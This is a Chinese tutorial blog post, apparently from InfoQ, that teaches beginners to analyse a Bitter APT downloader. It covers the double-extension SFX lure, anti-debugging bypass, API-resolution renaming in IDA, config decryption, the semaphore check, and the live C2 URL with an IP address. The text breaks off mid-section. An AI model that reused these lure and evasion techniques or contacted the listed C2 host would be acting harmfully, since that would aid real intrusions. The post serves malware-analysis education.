{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析到一個簡單又經典的樣本,想想最近比較無聊就好好寫寫APT分析的部分吧!","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"本文僅從樣本分析角度出發,樣本來源以及溯源部分就不多囉嗦了(寫了但是太長了,一起發閱讀性很差就不發了,而且也不是很有代表性,以後有機會發個別的。)","attrs":{}}]}],"attrs":{}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"初始載荷信息","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"攻擊的初始載荷是一個文件名爲雙後綴名的文件“開證裝期郵件.pdf.exe”,這是一種常見的文件僞裝方式,利用Windows的擴展名顯示設置(“隱藏已知文件類型的擴展名”)僞裝真實的.exe後綴,再選擇高級自解壓選項中自定義自解壓文件圖標,選擇讓exe文件看起來像PDF文檔,誘騙用戶打開。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"不過由於自解壓格式的圖標來源於文件,而不是系統自帶的圖標:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/fc/fc8897506ed768e38bb780c46579642c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"時常出現畫風不同的C位出道場面(一看就是自帶劇本的):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/bd/bd5e6d500bb237f9958c97ff1dc95244.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/5b/5b377f843db9c43798c9ecc41d735571.gif","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"VT搜索該文件MD5可以看到有52/69的高檢測率,匹配的YARA規則名可以解釋爲隱藏爲PDF的SFX自解壓文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/04/047d51fef6ff012fb4bc15cf645dcf4f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"SFX自解壓文件,是一種壓縮軟件生成的exe文件,擁有執行後可以解壓釋放文件並執行的特性,通常被病毒文件用來捆綁掩飾文檔或其他白文件進行僞裝。可將文件後綴改爲rar,使用壓縮軟件打開,查看其中的文件和相關代碼和解壓,或者在文件屬性的註釋中也可以看到。如本文中的樣本運行後會在“C:\\intel\\logs”路徑下釋放“dlhost.exe”並執行:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/31/31fdaa6e1caf4b457c7def98cb2ca36c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"直接雙擊運行exe使初始載荷在指定路徑下釋放文件也行,多一個步驟要找一下文件。一般來說解壓比較方便,但是有些樣本會檢測是否在設置的目錄下運行,不是則退出,分析時需注意這一點(本文樣本無此檢測)。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"有效載荷dlhost.exe","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"結論先行,帶入結論看內容比較容易看進去。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“dlhost.exe”經過分析後發現爲APT組織蔓靈花常用的下載器,用來收集受害者計算機信息和創建套接字通信,從遠程服務器下載插件完成其他功能的操作。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在分析之前,建議先做一些準備工作,磨刀不誤砍柴工~","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"去除隨機基址","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於PE的特性,程序有基址隨機化的問題,那麼在分析前,需要查看並修改爲不隨機的情況,便於下斷點分析後調試的配置文件(.udd)在重新運行後還能生效。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"方式有多種,比較簡單的是使用010Editor查看PE文件,將在PE結構中有字段“(NtHeader→OptionalHeader→DllCharacteristics→)IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE”,如果數值爲1,即開啓了“基址重定位”(動態隨機基址),現將其修改爲0後保存文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/31/3140f74293e1d9fb85f1efb03278ddd2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"也可以自己寫腳本或者可執行程序將其修改。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"查看斷點","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如果沒有特地隱藏或者處理要使用的函數的情況(可“一般”是有的),查看IDA的導入表窗口中顯示的函數,可以推測出一些功能,發現有:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.套接字通信的函數,那麼存在套接字通信(好繞):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/2c/2c8b40f73c8020a0c33bf39c082e599c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.文件操作函數,包括創建/打開、讀取和寫入等。可以推測有創建文件、讀取文件、移動文件等操作:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/e9/e9425db05aa69e8ef43e0c2bc1672174.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"3.獲取信息操作:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/8c/8c4e7d4d615cf55d9eccf4684ffa653f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"那麼此時可以通過導入表有個初步的判斷,這是一個有獲取計算機和用戶信息,並且有文件操作的聯網惡意軟件——基本上已經可以推測出這是下載器或文件竊取器了。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"反調試","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般來說惡意軟件都會有反調試功能,反調試的方向也分多類,如:探測Windows調試器、識別調試器行爲、干擾調試器的功能等。在《惡意代碼分析實戰》第16章反調試技術、《逆向工程核心原理》第51章靜態反調試技術&第52章動態反調試技術都有詳細介紹,一般工作中遇到“Sleep”和“IsDebuggerPresent”比較多。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"本樣本雖無干擾調試的“Sleep”,但有檢測調試環境的“IsDebuggerPresent”,問題不大,“15PB OD”的插件大禮包中“Hide Debugger”已將該函數的返回值HOOK,即反反調試(狗頭):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/ae/ae6fbc0e3ef099e018a76a8c9b6d220d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"對API下斷並檢查","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將樣本拖入OD後,對敏感API函數下斷,如:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"套接字通信中發送數據的“send”; 文件操作的“CreateFileW”、“ReadFile”和“WriteFile”; 用於執行惡意載荷或命令的“ShellExecuteA”等。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"接着可以“Alt+B”或菜單欄下的“B”(Break,斷點之意),查看已下的斷點,想取消斷點時從這裏也可以快速的找到:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/c9/c91c047e83c223c1a2b1e11e1f6795ec.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"查看後“Alt+C”或菜單欄下的“C”,可返回反彙編窗口。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"查看函數調用","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"返回後可以使用右鍵“查找”功能中的“所有模塊間的調用”,查看有無異常情況(那當然是有的):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/95/9599ffaf4519654c8ec999137dc18bf6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"大事不妙!異常就是大量調用動態獲取函數地址的“GetModuleHandleW”+“GetProcAddress”,這是一種常見的規避檢測的方式,並且也是一種反靜態分析手段:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/da/dae06710b9542f4db712dbae5aea4ec2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IDA處找到對應的函數或代碼後,使用IDA的腳本功能(Shift+F2):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/01/011af0f9134a1a5e72ca99475af64854.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"使用IDA的重命名函數“MakeNameEX”編寫的命令“MakeNameEx(long ea, string name, long flags);”。可以用Notepad++/Excel等編輯工具或Python/BAT腳本,將命令批量化處理後如下,複製粘貼後RUN:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/cf/cf62fb43aff298b18a79e3e65af94fe5.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將地址進行重命名,便於靜態分析:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d4/d4f8ee35fda6463d233d244557b8e26d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"出現個別因爲已有該名稱所以衝突不能重命名的,單獨重命名(N鍵)一下即可:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/64/6403ed5d25e5d375161dccf0895635c8.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"調試運行","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"IDA導出表可以查看到主函數“Start”地址,下斷後F9可直接運行到斷點處,進行調試分析。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"解密操作","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IDA界面還可以發現比較重要的功能代碼在函數401C80處,其中有大量的if+Do While循環解密(解密方式-= 0xD),問題不大,在解密函數完成後的那行代碼下斷:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d7/d7eb01830e9777270a0d8fc1ba4731b2.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"此處建議看看解密出的內存都是什麼數據,如果發現特殊的字符串或數據需要特地跟蹤一下。比如此樣本中解密的部分數據就很明顯包括註冊表路徑、外連的URL字符串、和一串疑似指令的字符串“Yes file”。這其實就是解密出了配置文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/02/02135e46d9c3bc9c211066b28cb4d2b7.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"環境檢測","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如上上圖所示,解密後就調用“CreateSemaphoreA”創建信號量“7t56yr54r”,接着調用“GetLastError”檢測信號量是否創建成功,如果錯誤碼爲定義“ERROR_ALREADY_EXISTS”的183(0xB7),即代表內存中已存在運行中的該進程,那麼其後續的函數40C234必然是退出進程函數(或者有可能進入擾亂分析或者僞裝功能的代碼):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d8/d833683daf9322ee66889d80d34d3955.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"通常惡意的可執行文件會通過CreateMutex創建互斥體或CreateSemaphore創建信號量(蔓靈花該下載器都是用信號量)+“GetLastError”獲取錯誤碼的方式讓惡意進程在內存中保持唯一運行的狀態,避免互相干擾。","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"那麼由此可以逆推,其實主要的功能代碼,一般是在判斷完互斥體或信號量後的部分","attrs":{}},{"type":"text","text":"(或者其他檢測行爲後)。時間比較緊迫的情況,可以考慮定位到檢測+“GetLastError”後,“if”判斷不成立的邏輯條件進行分析。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於本人調試分析時,常利用火絨劍等監測工具監測後臺運行的該進程,故“GetLastError”的返回值爲0xB7,此步可以通過修改寄存器的ZF標誌位跳過此步跳轉:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/69/69b248aa0ef3b21b1d1f8c6c071ed639.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"網絡行爲","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"初始化操作和解密操作等非惡意功能代碼比較多,先用IDA找比較重要的函數分析,再用OD按F4到CALL行查看其傳入的參數,如外連“http://162.0.229.203/RguhsT/RguhsT/”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/f2/f20f5fa228c740450eaadfac8f1ca1f8.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於分析時大部分情況是不建議聯網的,且有可能外連的域名或IP已失效,在套接字通信後的if判斷處修改跳轉。不跳就結束嘞(“Tab”鍵查看流程圖或者在“Graph overview”中可以看出,如果不跳就跳過大段代碼結束了):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/8a/8a793b41f618f0cd6d97e2a822a29364.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將光標定位到“if”判斷connect返回的結果處,按“Tab”鍵查看IDA的反彙編窗口,可以看到“if”的關鍵地址是“0x403678”,下斷運行到此處後修改ZF標誌位,讓其不跳轉即可:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/77/7740f3f5b